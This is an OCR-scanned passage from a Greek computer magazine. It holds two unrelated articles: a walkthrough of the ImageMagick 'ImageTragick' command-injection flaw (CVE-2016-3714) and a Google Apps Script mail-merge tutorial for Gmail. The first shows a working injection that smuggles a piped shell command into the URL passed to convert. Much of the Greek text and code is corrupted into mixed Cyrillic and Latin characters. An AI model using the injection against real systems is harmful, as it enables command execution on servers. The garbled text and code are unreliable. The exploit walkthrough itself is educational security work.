Μάλιστα. Και τώρα; Ευτυχώς για λόγους καλής ψυχικής υγείας και γαλήνης, δεν 
συμµετέχουµε ενεργά στην ανάπτυξη του ImageMagick. Δεν έχουµε την παραμικρή 
ιδέα για τη δομή ἡ οτιδήποτε άλλο που σχετίζεται µε την ανάπτυξη του συγκεκρι- 
μένου λογισμικού. Τι ψάχνουμε, λοιπόν; Μα, éva στοιχείο που θα µας βοηθήσει να 
κατανοήσουμε πώς δουλεύει ο μηχανισμός κατά τον οποίο, παρόλο που δίνουμε ως 
εἰσοδο ένα link, το πρόγραµµα καταλαβαίνει ότι πρόκειται περί εικόνας. Θυμηθείτε 
τι κάναμε πριν διαβάσουμε то тап раде: καταφύγαμε στο wget! 


Σκεφτόμαστε λοιπόν ότι το ImageMagick ίσως να χρησιμοποιεί κι αυτό το wget, xw- 
ρίς να το γνωρίζουμε. Δεν εἰναι και πολύ τραβηγµένη υπόθεση. Пат! να εφεύρεις 
τον τροχό, όταν τον έχεις ήδη; Θυμηθείτε άλλωστε ότι στον κόσμο του LinuX έχουμε 
πολλά μικρά εργαλεία που κάνουν καλά µια συγκεκριμένη δουλειά και συνεργάζο- 
νται ἡ συνδυάζονται μεταξύ τους. Όταν λοιπόν έχεις το wget που είναι καλό στο 
downloading, γιατί να µην το χρησιμοποιείς όποτε χρειάζεσαι κάτι апо το δίκτυο; 
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Αυτή τη στιγµή, δεν μένει παρά να ψάξουμε στα αρχεία πηγαίου кшбіка του 
ImageMagick, wote να ελέγξουμε την υπόθεσή µας. Επειδή όµως τα αρχεία είναι 
πολλά και για µια αναζήτηση σε καθένα εξ αυτών Ва χρειαζόμασταν άπειρο χρόνο 
(пф, υπερβολές), θα καταφύγουµε σ' алло ενα εξειδικευμένο εργαλείο: то grep. Στη 
σύνταξη της σχετικής εντολής θα εµπλέξουμε συγκεκριμένες παραμέτρους, γιατις 
οποίες µπορείτε να μάθετε περισσότερα από το тап раде του grep ("man grep", Xw- 
ρίς τα εισαγωγικά). 


panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> grep -rwn . -e 'wget' 


./magick/delegate.c:95: " <delegate decode=\"https\" 
command=\"&quot;wget&quot; -q -0 &quot;%o&quot; &quot;https:%M&quot;\"/>" 


Διάνα! Βρήκαμε κάτι στη γραμμή 95 του αρχείου delegate.c. Па уа κάνουμε то αποτέ- 
Леора πιο ευδιάκριτο, αντικαθιστούμε το δαιιοῖ; µε το αντίστοιχο σύμβολο апо то 
πληκτρολόγιο (διπλό εισαγωγικό, "): 


"<delegate decode=\"https\" соттапд=\" "мре" -q -0 "πο" "https:%M"\"/>" 


Me απλά λόγια, αυτό που λέει το παραπάνω κομμάτι κώδικα είναι: αν σου δώσει ο 
χρήστης ως είσοδο κάποιον σύνδεσμο https, τότε τρέξε την εντολή 


"wget" -q -0 "»ο" "Πτῖρς: 


Πράγματι λοιπόν, βλέπουμε ότι το ImageMagick κάνει χρήση του wget σε συνδυα- 
оро µε κάποιες παραμέτρους. Ας ανοίξουμε то тап раде ("man wget"), ώστε να τις 
γνωρίσουμε: 


-q 

--quiet 
Turn off Wget's output. 

-0 file 

--output-document=file 
The documents will not be written to the appropriate files, 
but all will be concatenated together and written to file. 


Με τη χρήση του -q ο χρήστης δεν βλέπει κανένα output προερχόμενο апо то wget, 
ενω µε το -O αποθηκεύουµε το αρχείο που κατεβαίνει µε το όνοµα που θέλουμε. 
Τι σημαίνουν όµως τα %о και %M; Θα χρησιμοποιήσουμε και πάλι την εντολή grep, 
καθώς δεν βρήκαμε κάτι σχετικό στο тап раде του wget κι αυτό µας κάνει να UTO- 
ψιαζόμαστε оті πρέπει να προέρχονται апо то ImageMagick. 
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panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> grep -rwn . -e '%о\|%М' 
./www/escape.html:286: ο output filename (used for delegates) 


./www/escape.html:302: %M Magick filename (original file exactly as given, 
including read mods) 


Τα βρήκαμε! Βλέπουμε ὁτι είναι ειδικοί χαρακτήρες (macros) που χρησιμοποιεί το 
ImageMagick, ώστε να περνά πληροφορίες περί εισόδου κι εξόδου. Πατην wpa δεν 
γνωρίζουμε την έννοια delegate (αναφέρεται στη γραμμή 286), αλλά υποψιαζόμαστε 
ότι πρέπει να παίζει κάποιο ρόλο στην όλη υπόθεση. Έχοντας συλλέξει αρκετές 
πληροφορίες, μπορούμε να πούμε µε περισσότερη αυτοπεποίθηση ότι πίσω από 
την εντολή convert εκτελούνται εντολές σαν την ακόλουθη: 


wget -q -0 "image.png" https://i.imgur .com/u68Vakj.jpg 


Τώρα όµως προκύπτει ἕνα άλλο ερώτημα: Τι γίνεται στην περίπτωση που δεν ἐχου- 
µε το wget εγκατεστημένο στο σύστημά µας; Θα μπορούσαμε να το απεγκαταστή- 
σουµε г να то µετακινήσουµε σε µια µη-τυπική θέση - και να δοκιµάσουµε ξανά. 


Το κάναμε. Διαπιστώσαμε ότι το ImageMagick κατάφερε και πάλι να κάνει τη PETA- 
τροπή - ακόµη και χωρίς το wget, δηλαδή. Προφανώς, για την περίπτωση απουσίας 
του wget το ImageMagick θα πρέπει να έχει πρόσβαση σε εναλλακτική λειτουργία. 
Σύμφωνα µε το αποτέλεσµαπου µας επέστρεψε то grep (για то wget), σκεφτόμαστε 
να ψάξουμε χρησιμοποιώντας το string 'delegate ἀεοοάς' και µετά να κάνουμε κι ένα 
grep, επί των ὁποιων αποτελεσμάτων, για οτιδήποτε σχετικό µε το https: 


panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> grep -rwn . -e 'delegate 
decode=' | grep https 

‚ /ww/source/delegates.xml:79: <delegate decode="https" 

command="&quot; curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot ;"/> 


./magick/delegate.c:95: " <delegate decode=\"https\" 
command=\"&quot;wget&quot; -q -0 &quot;%o&quot; &quot;https:%M&quot;\"/>" 


Καταλαβαίνουμε λοιπόν ότι για το https delegation, για το οποίο εξακολουθούµε να 
μην έχουμε ιδέα, χρησιμοποιείται και το εργαλείο сип. Είναι αλήθεια ότι αρκετές 
φορές έχουµε χρησιμοποιήσει το curl για χρήση παρόμοια и' αυτή του wget, ара 
η παρουσία του εδω δεν µας παραξενεύει ιδιαίτερα. Μετατρέποντας και πάλι τα 
&quot; στον αντίστοιχο χαρακτήρα, παίρνουμε την ακόλουθη εντολή: 


"curl" -s -k -o "πο" "һїїр<5:%М" 


Στο σηµείο αυτό σίγουρα έχετε καταλάβει πώς εργαζόµαστε, οπότε δεν χρειάζεται 
να σας πούμε оті πληκτρολογούμε "тап curl", οὐτε оті για τις παραμέτρους μαθαί- 
νουµε τα εξής: 


39 


УНА©@КЕК 


-5, --511епі 


Silent ог quiet mode. Don't show progress meter ог error messages. Makes Curl 
mute. It will still output the data you ask for, potentially even to the 
terminal/stdout unless you redirect it. 


-k, --insecure 


(SSL) This option explicitly allows curl to perform "insecure" SSL connections 
and transfers. All SSL connections are attempted to be made secure by using 
the CA certificate bundle installed by default. This makes all connections 
considered "insecure" fail unless -k, --insecure is used. 

-ο, --output <file> 


Write output to <file> instead of stdout. If you are using {} or [] to fetch 
multiple documents, you can use '#' followed by a number in the <file> specifier. 
That variable will be replaced with the current string for the URL being 
fetched. 


Προσέξτε παρακαλούμε την υποχρεωτική χρήση στο curl της παραμέτρου -k, η 
οποία επιτρέπει ακόµη και συνδέσεις HTTPS που "δεν: εἶναι ασφαλείς. 


Delegation: Н Αχίλλειος Πτέρνα 


Πριν συνεχίσουμε πρέπει να μάθουμε σε τι στο кало αφορά αυτή η έννοια του 
delegation. Εντάξει, κάπου πηγαίνει το μυαλό όλων µας, καλό εἰναι όμως να βεβαι- 
ωθούμε. Ανοίγουμε λοιπόν το һїїрз://ѕеагсһ.іѕсоппесї. те ἡ οποιαδήποτε άλλη 
μηχανή αναζήτησης προτιμάτε, και ξεκινάμε το ψάξιμο. Μετά ато λίγα λεπτά περιή- 
γησης στον ιστό, μπορούμε να πούμε ότι έχουµε καταλάβει τι εννοεί ο проүрарра- 
τιστής µε το delegation. 


Ουσιαστικά πρόκειται για éva feature του ImageMagick, το οποίο του επιτρέπει να 
επικοινωνεί µε ξένα εργαλεία και βιβλιοθήκες, ούτως ώστενα φέρει εις πέρας το 
καθήκον που του αναθέτει ο χρήστης. Па παράδειγµα, αν του ζητήσουμε να µας uE- 
τατρέψει µια εικόνα σε µορφή JPEG, τότε το λογισμικό θα πρέπει να μιλήσει µε τη 
βιβλιόθηκη του JPEG. Εκτός апо то JPEG υπάρχουν, προφανώς, κι άλλα delegation 
libraries, ὁπως εκείνα περί PNG, TIFF, TrueType к.а. 


Χωρίς να χάνουμε χρόνο, ανοίγουμε то тап раде του ImageMagick και ψάχνουμε 
αναφορές προς την λέξη "delegate". Διαπιστώνουμε πως για να δούµε όλα τα UTO- 
στηριζόµενα delegations, στο τερματικό αρκεί να πληκτρολογήσουµε τα ακόλουθα: 


panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> convert -list delegate 


Τα αποτελέσµατα поо παίρνουμε δεν εἰναι και λίγα, οπότε αξίζει уа TA φιλτράρουμε. 
Παράδειγμα: 


panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> convert -list delegate | 
grep http 
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https => "curl" -s -k -L -o "χο" "һїїр<:%М" 


Είμαστε πλέον σίγουροι ότι η εντολή curl είναι αυτή που τρέχει στο σύστημά µας, 
όποτε ζητάμε από το ImageMagick v' ανακτήσει την εικόνα µέσω ενός HTTPS link. 


"М" φορ µάτζικ 


О λόγος γίνεται για το macro %М, το οποίο έχει την έννοια του Magic filename. 
https => "curl" -s -k -L -o "πο" "һїїр<$:%М" 


Σύμφωνα ре то CVE-2016-3714, ο "μαγικός" έλεγχος που κάνει TO ImageMagick δεν 
εἶναι τόσο καλός ὁσο θα έπρεπε. Ως αποτέλεσµα, καθίσταται δυνατό το τραγικό 
σενάριο που θα περιγράψουμε σε πολύ λίγο. Προκειμένου να κατανοήσουμε кала т! 
συμβαίνει, πηγαίνουμε πρῶτα σ’ έναν προσωρινό κατάλογο και φτιάχνουμε μερικά 
αρχεία. Το περιεχόμενό τους δεν ενδιαφέρει και θα τα χρησιμοποιήσουμε καθαρά 
για την επίδειξη του отто συζήτηση exploit. 


panos@ohsuse:/tmp/test/before/ImageMagick-6.8.8-1> mkdir ~/test; са ~/test 
panos@ohsuse:~/test> touch file1 file2 file3 file4 file5 


Πολύ ωραία. Το σενάριό µας λέει ότι θέλουµε να κατεβάσουµε την εικόνα апо то 
https://i.imgur.com/u68Vakj.jpg και να την αποθηκεύσουµε ως image.jpg, κάνοντας 
χρήση της εντολής που χρησιμοποιεί το ImageMagick (αυτής, µε το curl) κι αµέσως 
μετά επαληθεύοντας µε то ls ότι έχουµε πράγματι το αρχείο ітаде јро. 


panos@ohsuse:~/test> curl -s -k -o image.jpg https://i.imgur .com/u68Vakj.jpg; 
ls -al 


total 40 


drwxr-xr-x 2 panos users 88 May 18 07:57. 
drwxr-xr-x 23 panos users 4096 May 18 07:53 .. 
-rw-r--r-- 1 panos users 0 May 18 07:53 file1 
-rw-r--r-- 1 panos users 0 May 18 07:53 file2 
-rw-r--r-- 1 panos users 0 May 18 07:53 file3 
-rw-r--r-- 1 panos users 0 May 18 07:53 file4 
-rw-r--r-- 1 panos users 0 May 18 07:53 file5 
-rw-r--r-- 1 panos users 35377 May 18 07:57 image.jpg 


Τιθαλέγατε τώρανα δοκιµάζαµε κάτι παράξενο; Συγκεκριµένα, λέμε уа διαγράψου- 
µε το αρχείο image.jpg ("rm image.jpg"), να κατεβάσουµε ξανά την εικόνα κι αυτή тп 
φορά να τη διοχετεύσουμε, µέσω του pipe, στην εντολή 15. Έχει κάποιο νόηµα αυτό; 
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Όχι, δεν έχει. Μην ξεχνάτε όµως ότι τόσο οι επιτιθέµενοι (blackhat hackers) όσο και 
οι αμυνόμενοι (whitehat hackers, реп-їеѕїегѕ, υπεύθυνοι ασφαλείας κ.ά. δεν окёфто- 


νται συμβατικά. 


panos@ohsuse:~/test> гт image.jpg 
panos@ohsuse:~/test> curl -s -k -o 


ls -al 

total 4 

drwxr-xr-x 2 panos 
drwxr-xr-x 23 panos 
ΞΓΙ-Γ--Γ-- 1 panos 
-rw-r--r-- 1 panos 
-rw-r--r-- 1 panos 
ΞΓΙ-Γ--Γ-- 1 panos 
-rw-r--r-- 1 panos 


users 71 
users 4096 
иѕегѕ 0 
иѕегѕ 0 
иѕегѕ 0 
иѕегѕ 0 
иѕегѕ 0 


panos@ohsuse:~/test> ls -al 


total 40 

drwxr-xr-x 2 panos 
drwxr-xr-x 23 panos 
-rw-r--r-- 1 panos 
ΞΓΙ-Γ--Γ-- 1 panos 
-rw-r--r-- 1 panos 
-rw-r--r-- 1 panos 
ΞΓΙ-Γ--Γ-- 1 panos 
-rw-r--r-- 1 panos 


users 88 
users 4096 
users 


0 
users 0 
users 0 
users 0 
иѕегѕ 0 
иѕегѕ 35377 


Мау 
Мау 
Мау 
Мау 
Мау 
Мау 
Мау 


Мау 
Мау 
Мау 
Мау 
Мау 
Мау 
Мау 
Мау 


іта 


18 
18 
18 
18 
18 
18 
18 


18 
18 
18 
18 
18 
18 
18 
18 


ве. 


jpg https://i.imgur.com/u68Vakj.jpg | 


ΠΙΕΙ ο 

ΠΡΟ το 

:53 {161 
:53 {162 
{53 {163 
{53 {164 
:53 {165 


05 

3198) ас 

:53 file1 

:53 {162 

:53 ез 

:53 {Пе4 

:53 #1е5 

:05 image.jpg 


Παρατηρούμε от, αν και δεν έχει κανένα VÓNA αυτό που κάναμε, το αποτέλεσµα 
εἰναι το (бло. Εδώ λοιπόν προκύπτει το ερώτημα: Τι θα γίνει αν, αντί για το link, τρο- 
φοδοτήσουµε στο Magicfile (%М) το link «μαζί: µε το pipe προς μία εντολή, όπως, 
TX., TNV Is; Με άλλα λόγια, θέλουμε να δούμε τι θα γίνει αν δώσουμε µια εντολή στο 
convert του ImageMagick, έτσι ώστε να ισχύει 


M% = //i.imgur.com/u68Vakj.jpg"|ls "-1а 


Tı Oa συμβεί; Πάμε να то δούμε! 


panos@ohsuse:~/test> convert 'https://i.imgur.com/u68Vakj.jpg"|ls "-la' image. 


png 
total 4 
drwxr-xr-x 2 panos 
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drwxr-xr-x 23 panos users 4096 Мау 18 07:53 

-rw-r--r-- 1 panos users 0 May 18 07:53 file1 
-rw-r--r-- 1 panos users 0 May 18 07:53 file2 
-rw-r--r-- 1 panos users 0 May 18 07:53 file3 
-rw-r--r-- 1 panos users 0 May 18 07:53 file4 
-rw-r--r-- 1 panos users 0 May 18 07:53 file5 


Λοιπόν, για κάποιο λόγο πήραμε το αποτέλεσµα της εντολής Is -la. Αν αµέσως µετά 
δώσουμε ένα "Is -|8', θα διαπιστώσουμε ότι το αρχείο image.png ἔχει όντως δηµιουρ- 
γηθεί. Μόνο που то convert δεν περιορίστηκε στο downloading και στη μετατροπή, 
αλλά εκτέλεσε κι ότι βρισκόταν στα δεξιά του pipe. Κι αυτό, φίλες και φίλοι, εἶναι 
то exploit µε κωδική ονομασία СУМЕ-2016-3714, γνωστό κι ως ImageTragick. Ας το 
πούμε και λίγο διαφορετικά: Κάθε φορά που έχουµε delegation, δηλαδή προσφυγή 
σε εξωτερικό εργαλείο ἡ βιβλιοθήκη, то ImageMagick αποτυγχάνει να ελέγξει τι 
"κρύβει" то %М και κατά συνέπεια είναι δυνατό να εκτελέσει ακόµη και κώδικα που 
*бєвү* Ва έπρεπε. 


Activities GNOME Terminal = Thu 09:11 


panos@ohsuse:~/test 


File Edit View Search Terminal Help 


panos@ohsuse:~/test> 
panos@ohsuse:i~/test> convert 'https://i.imgur.com/u68Vakj.jpg"|ls "-la' image -ons @ 
total 4 

drwxr-xr-x users May 18 13:15 . 

drwxr-xr-x users May 18 07:53 .. 

-rw-r--r-- users May 18 07:53 filel 

=rw-r--r-- users May 18 07:53 file2 

-rw-r--r-- users May 18 07:53 file3 

-rw-r--r-- users May 18 07:53 file4 

-rw-r--r-- users May 18 07:53 file5 


panos@ohsusei~/test> ls -la 
total 216 


drwxr-xr-x 2 panos users May 18 1:15 
drwxr-xr-x 23 panos users May 18 :53 
-rw-r--r-- panos users May 18 153 #11е1 
panos users May 18 :53 file2 
panos users May 18 153 file3 


1 
=ги=г==г== сү 
1 

-rw-r--r-- 1 panos users May 18 153 file4 
1 
1 


πμ. πμ... 


-rw-r--r-- panos users May 18 153 file5 

ΠΠ рапоѕ иѕегѕ 214156 Мау 18 :15 image.png 
panos@ohsuse:~/test> identify image.png 

image.png PNG 512x512 512x512+0+0 8-bit sRGB 256c 214KB 0.000u 0:00.000 
panos@ohsuse:~/test> J 


Το εργαλείο convert του ImageMagick αποτυγχάνει να ελέγχει επαρκώς το URL προς ша εικόνα που πρόκειται να 
κατεβάσει, µε αποτέλεσµα να εκτελεί κώδικα που δεν θα έπρεπε. Στο παράδειγµα, δίπλα апо το URL βάζουμε τον 
τελεστή pipe και µετά την αθώα εντολή για προβολή των περιεχομένων του τρέχοντα καταλόγου (1). Το convert 
πράγματι εκτελεί την εντολή [5 (2), ενώ φροντίζει κι αποθηκεύει το απομακρυσμένο αρχείο εικόνας (JPEG) στη νέα 
του µορφή (PNG, 3). 


Γυρίστε τώρα στη σελίδα 54, όπου βλέπουμε περισσότερα για το πώς εκμεταλλεύ- 
ETAL κάποιος το ΟνΕ-2016-8714, αλλά και τα µέτρα προστασίας που μπορούμε ν' 
αναπτύξουμε. 


43 


Skill: Beginner 
Tags: Gmail, Google Drive, mail merge 


Συγχώνευση 
Αλληλογραφίας 
στο Gmail 


Н ιδέα της συγχώνευσης αλληλογραφίας είναι αρκετά δελεαστική, ιδιαίτερα 
όταν είναι δυνατό να συνδυάζεται µε την ευκολία των υπηρεσιών webmail. 
Αποφασισμένοι να αξιοποιήσουµε στο έπακρο την cloud πλατφόρμα της Google, 
στήνουμε το δικό µας σύστημα συγχώνευσης αλληλογραφίας χρησιμοποιώντας 
αποκλειστικά και µόνο υπηρεσίες που παρέχει η εταιρεία. Δρόμος δεν υπάρχει, 
αλλά αυτό δεν σηµαίνει πως δεν μπορούμε να τον δημιουργήσουμε. 


του Πέτρου Κυλαδίτη 


Н διαχείριση του email έχει πλέον μεταφερθεί σχεδόν ολοκληρωτικά στο мер, εν 
πολλοίς χάρη στις δωρεάν υπηρεσίες webmail των μεγάλων παικτών του χώρου. Н 
ευκολία ασφαλούς πρόσβασης στα emails απ οπουδήποτε, µε τη βοήθεια ενός µόνο 
browser, εἰν' éva апо τα πολλά πλεονεκτήματα αυτής της πλατφόρμας. Φυσικά, το 
cloud έχει και τους περιορισμούς του. Συχνά, υποχρεωνόµαστε να συμμορφωνόμα- 
στε στους υποδεικνυόµενους τρόπους χρήσης κι апо εκεί και πέρα δεν υπάρχουν 
πολλά που μπορούμε να κάνουμε. 


Ἡ τουλάχιστον κάτι τέτοιο ισχύει «σχεδόνχ πάντα. 


Προσωποποιηµένη µαζικότητα 


Όλες οι σουίτες εφαρμογών γραφείου που σέβονται τον εαυτό τους, ενσωµατω- 
νουν λειτουργίες συγχώνευσης αλληλογραφίας. Πρόκειται για τη δηµιουργία προ- 
σωποποιηµένων emails που στέλνονται όμως μαζικά σε ша Ліста επαφών. Па κάθε 
επαφή αλλάζει µόνο éva προκαθορισμένο πλήθος πεδίων στο email (π.χ., éva πεδίο 
θα μπορούσε να εἰναι το буора, éva ἄλλο ο χρόνος που απομένει για τη λήξη µιας 
συνδρομής κ.ο.κ.) 


Αναλυτικότερα, στη συγχώνευση αλληλογραφίας δημιουργούμε éva έγγραφο, 
εντός του οποίου ορίζουμε κάποια µεταβλητά πεδία. Στη συνέχεια, δημιουργούμε 
µια λίστα µε τους παραλήπτες της αλληλογραφίας, και δίπλα στον καθένα ἡ στην 
καθεμία αντιστοιχίζουµετις προσωποποιηµμένες τιμές των πεδίων. Στη συνέχεια, η 
εφαρμογή συγχώνευσης αναλαμβάνεινα συνδυάσει όλα αυτά ка va στείλει σε κάθε 
παραλήπτη το προσωποποιηµένο του буора. 
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Συγχώνευση Αλληλογραφίας στο Gmail 


Συγχώνευση αλληλογραφίας сто cloud 


Κάτι που λείπει апо το Gmail είναι µια κάποια λειτουργία για συγχώνευση αλληλο- 
γραφίας. Αυτή την παράλειψη μπορούμε να τη δούµε ως ένα апо τα γεγονότα της 
ζωής που αναγκαστικά αποδεχόµαστε. Εναλλακτικά, μπορούμε να στρωθούµε στη 
δουλειά και να επινοήσουµε και να υλοποιήσουμε µια λύση, η οποία µε κάποιο τρόπο 
θα φέρνει τη συγχώνευση αλληλογραφίας ото Gmail. 


Είναι νοµίζουµε περισσότερο апо προφανές ότι δεν υπήρχε οὐτε µία στο εκατομμύ- 
ро να τηρήσουμε την πρώτη, μάλλον µοιρολατρική, στάση. 


Αντίθετα, θα καταφύγουµε στη Google Script, µια σκριπτογλὠσσαπου ελεύθερα па- 
ρέχει η εταιρεία, καθώς και στην υπηρεσία του Google Drive, προκειµένου να φέρου- 
µε τη συγχώνευση αλληλογραφίας µε то «ζόρι: στο Gmail. 


Ουσιαστικά, η Google Script εἶναι η γλώσσα Javascript µαζί µε αντικείµενα του АРІ 
που ἐχει δημιουργήσει η Google για την πρόσβαση στις διάφορες υπηρεσίες της. 
Θα μπορούσαμε να την παραλληλίσουμε µε την (παλαιολιθική) ΝΒΑ, στο Office 
της Microsoft. Εκτός από τη Google Script, στη φαρέτρα µας θα prer και το Google 
Sheets, η online εφαρµογή υπολογιστικών φύλλων της Google. Σε φύλλο εργασίας 
του Google Sheet θα φιλοξενούνται όλα τα δεδομένα που θα αφορούν στο email μας, 
το κείµενο και οιλίστες των πεδίων. 


Ώρα για δράση 


Συνδεόµαστε αρχικά στο Google account µας και μπαίνουμε στο Google Drive 
(https://drive.google.com). Από εκεί δημιουργούμε ένα νέο υπολογιστικό φύλλο, πα- 
τώντας το κουμπί "Мёо" κι επιλέγοντας, φυσικά, Ὑπολογιστικά φύλλα Google". 


Google Αναζήτηση στο Drive 
& Drive To Drive pou ~ 
Ovopa T 
ЕЕ Συγχώνευση Αλληλογραφίας 
Φάκελος ώτητες Π.Ε. Χίου 
Μεταφόρτωση αρχείου tnpa Χρύσας хіѕ 
zio 
Е Googl 
E Έγγραφα Google γχειρίδιο της ΓΛΩΣΣΑΣ 
Υπολογιστικά φύλλα Google δι 
[πε] Παρουσιάσεις Google олор 
Περισσότερα > πεζες σύγκριση Η δηµιουργία ενός νέου φύλλου εργασίας 
γίνεται από τη σχετική επιλογή της λίστας, 
4%. Google Photos БЫ орап που εµφανίζεται πατώντας то κουμπί "Νέο" 


быр ото Google Drive. 
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Στο νέο βιβλίο εργασίας, στο οποίο δίνουμε το πρωτότυπο όνοµα deltaMerge, θα 
στήσουµε όλον το μηχανισμό της συγχώνευσης. Н άντληση των δεδοµένων θα γίνε- 
ται апо то прото φύλλο. Στα κελιά ΑἹ κι А2 γράφουμε "Θέμα" και "Κείμενο". Όπως 
καταλαβαίνετε, στα διπλανά απ’ αυτά τα κελιά θα συμπληρώσουμε το θέµα και то 
κείµενο του μηνύματος που θέλουμε να στείλουμε. Στο κελἰ АЗ βάζουμε τον τίτλο 
"Μεταβλητές" και στο διπλανό του τοποθετούμε τη συνάρτηση "=СООМТА(4:4)". H 
συγκεκριμένη συνάρτηση επιστρέφει το πλήθος των µη κενών κελιών του οριζόµε- 
νου εύρους. Στην προκειμένη περίπτωση, μετράει τα µη κενά κελιά της γραμμής 4, 
τα οποία παρεμπιπτόντως αντιστοιχούν στους τίτλους των μεταβλητών των πεδί- 
ων που θέλουμε να συγχωνεύσουµε µέσα στο κεἰμενό µας. Πα να εἰναι αναγνωρίσι- 
μοι οι τίτλοι των πεδίων μέσα στο σώμα το μηνύματος, θα πρέπει να τοποθετηθούν 
μέσα σ' αυτό στη µορφή 9{'τίτλος') 


Κώδικας πίσω απ' όλα 


Μέχρι στιγμής όλα δείχνουν καλά και μάλλον όπως τα ξέρουμε. Έχουμε αποθέσει 
τα δεδοµένα µας, έχουµε κάνει κάποιες συμβάσεις του στυλ πού θα βάλουμε τι και 
τι σημασία έχει το καθετί στο φύλλο µας, όμως пос θα λειτουργήσει η συγχώνευση; 
Πού εἰναι ο κώδικας, ο οποίος θα θέσει σε λειτουργία τη μηχανή µας; Όπως θααντι- 
λαμβάνεστε, ο κώδικας δεν είναι πουθενά και πρέπει να τον γράψουμε οι ἰδιοι. Πού 
θα прёпе va то γράψουμε, όμως; 


Αν δοκιμάσουµε να πάμε στο μενού "Εργαλεία" > "Πρόγραμμα επεξεργασίας σενα- 
ρίων", παρατηρούμε ότι ανοίγει µια νέα καρτέλα στον мер browser κι εμφανίζεται о 
λεγόμενος Script Editor. 


Αρχείο Επεξεργασία Προβολή Εισαγωγή Μορφή Δεδομένα Εργαλεία Πρόσθετα Βοήθεια Όλες οι αλλαγές αποθηκεύονται στο Drive 


© с лм" ε % ο 091237 Arial -~ ο Δημιουργία φόρμας =- l->- с Ы |Ы Үү -Σ- A- 
fx 
`- Πρόγραµµα επεξεργασίας σεναρίου... 
т z Ξ Ξ рбүраџра επεξεργασίας σεναρί τι 7 
=== Ὀρθογραφικός έλεγχος. 


ν΄ Ενεργοποίηση αυτόματης συμπλήρωσης 
Κανόνες ειδοποίησης. 


Προστασία φύλλου 


= з σο δω кю - 


aaron? 


18 


Н πρόσβαση στον Script Editor είναι δυνατή апо τη 
σχετική επιλογή του μενού "Εργαλεία". 


Στο πλαίσιο κειµένου που δεσπόζει στην επιφάνειά του, μπορούμε VA εισάγουµε τον 
κώδικα. Τον παραθέτουμε εδώ: 
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01 function опОреп() { 
02 SpreadsheetApp.getUi() 


03 .сгеаёеМепи( ' Συγχώνευση ета11') 
04 .айаїтет( Αποστολή", 'send') 

05 .адатоџі(); 

06 } 

07 


08 function ѕепа() < 

09 маг spread = SpreadsheetApp.getActiveSpreadsheet(); 

10 маг sheet = ѕргеаа. реЅһееїѕ()[0]; 

11 маг питуагѕ = sheet.getRange("B3").getValue(); 

12 маг range = sheet.getRange(5, 1, sheet.getMaxRows() - 1, питагѕ); 
13 маг subject = ѕһееї. реКапре( "В1" ).веёМа1џе(); 

14 маг body = sheet.getRange("B2").getValue(); 


16 records = getRows(sheet, range); 

17 Жог (маг 1 = 0; 1 < гесогӣѕ.Іепрёһ; 111) { 

18 маг гом = гесогаѕ [1]; 

19 var mergedBody = mergeBody(body, гом); 

20 MailApp.sendEmail(row. ["email"], subject, mergedBody) ; 
2 о 


22 Вго\$ег.т<рВох("Н αποστολή " + records.length + " μηνυμάτων 
ολοκληρώθηκε! ") ; 


35 } 

24 

25 function getRows(sheet, range){ 

26 varsRowĪndex = range.getRowIndex() - 1; 

27 var numColumns = range.getEndColumn() - range.getColumn() + 1; 


28 маг varsRange = sheet .getRange(varsRowIĪndex, range.getColumn(), 1, 
numColumns ); 


29 var vars = varsRange.getValues()[0]; 

30 маг records = getRecords(range.getValues(), vars); 
31 return records ; 

52 ἢ 

33 

34 function getRecords(data, Кеуѕ){ 

35 маг records = []; 

36 Тог(маг 1 = 0; 1 < дата. length; ++1){ 
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37 var record = {}; 
38 var isEmpty = true; 
39 for(var j = 0; j < data[i].length; ++j){ 


40 var cellData = data[i][j]; 
41 if(cellData == ""){ 

42 continue; 

43 } 

44 record[keys[j]] = cellData; 
45 isEmpty = false; 

46 } 

47 if(!isEmpty){ 

48 records .push(record); 

49 } 

50 } 

51 return records; 

502 

53 


54 function mergeBody(body, data) { 
55 var mergedBody = body; 
56 маг vars = тегрейВоду.таїсһ(/\$\{\"[^\"]+\"\}/р); 


57 

58 for (маг і = 0; і < vars.length; ++i) { 

59 var магМате = vars[i].substring(3,(vars[i].length-2)); 
60 var varData = data[varName] ; 

61 mergedBody = mergedBody.replace(vars[i], varData || ""); 
62 } 

63 

64 return тегредВоду; 

65 } 


Σηµείωση: Tov Κώδικα μπορείτε να τον κατεβάσετε апо то http://bit.ly/ 
dh054deltamerge. 


H συνάρτηση onOpen καλείται όταν ανοίγει το έγγραφο µε την εφαρµογή Google 
Sheets και προσθέτει στο ήδη υπάρχον μενού éva δικό µας, µε τίτλο "Συγχώνευση 
email". Από κάτω προσθέτει και το στοιχείο ᾿Αποστολή", το οποίο όταν επιλέγεται 
апо τον χρήστη καλεί τη συνάρτηση ѕепа. 
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Н send, τώρα, όπως καταλαβαίνετε κι апо το буора της, αποτελεί τη βασική συ- 
νάρτηση του σεναρίου µας, η οποία εκτελεί τη συγχώνευση και την αποστολή 
των emails. Н send συνεπικουρείται апо τις συναρτήσεις getRows, деїбесогаѕ και 
тегдеВоау. Ας δούµε όμως та πράγματα µε τη σειρά. 


Αρχικά στη send, στις γραμμές апо 09 έως 14, αρχικοποιούµε µια σειρά από ETA- 
βλητές. Συγκεκριµένα στην 09 αναθέτουµε στη μεταβλητή spread το τρέχον βιβλίο 
εργασίας, το οποίο παίρνουμε καλώντας τη συνάρτηση деїАсііуе$ргеааѕһееї() του 
αντικειμένου ЅргеадѕћееїАрр. Πρόκειται για µια μέθοδο ενός αντικειμένου апо το 
Google API. Αντίστοιχα στη συνέχεια, µε την κλήση της getSheets() κι επιλέγοντας 
το πρωτο στοιχείο του επιστρεφόµενου πίνακα αντικειμένων, αναθέτουµε στη HE- 
ταβλητή sheet το πρώτο φύλλο του βιβλίου εργασίας µας. Την αµέσως επόμενη 
γραμμή, µε τη βοήθεια της getRange στην οποία μπορούμε να ορίσουµε το буора 
ενός κελιού, παίρνουμε το αντικείµενο που το αντιπροσωπεύει. Κι όπως βλέπετε 
στην ἴδια γραµµή, καλώντας τη getValue αυτού, µας επιστρέφεται η τιµή του. Στη 
getRange, χάρη στην έννοια του πολυμορφισμού του αντικειμενοστραφούς TPO- 
